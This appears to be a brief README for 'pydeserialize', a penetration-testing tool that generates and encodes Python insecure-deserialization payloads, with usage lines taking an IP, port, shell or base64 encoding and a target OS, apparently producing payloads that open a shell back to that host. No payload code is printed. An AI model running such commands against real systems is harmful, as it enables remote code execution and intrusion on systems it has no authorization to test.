pydeserialize is a tool that generates insecure deserialization payloads in Python. It can also encode the generated payloads, and it is designed to be simple and fast.
I designed pydeserialize to handle both payload generation and encoding, keeping a consistently passive model to make it useful for penetration testers.
- Generates payloads to exploit insecure deserialization vulnerabilities in Python
pydeserialize -ip 192.168.4.113 -p 80 -e shell -o Windows
pydeserialize -ip 192.168.4.113 -e b64 -p 80 -o Linux
pydeserialize requires Python 3. To install it, run:
pip3 install pydeserialize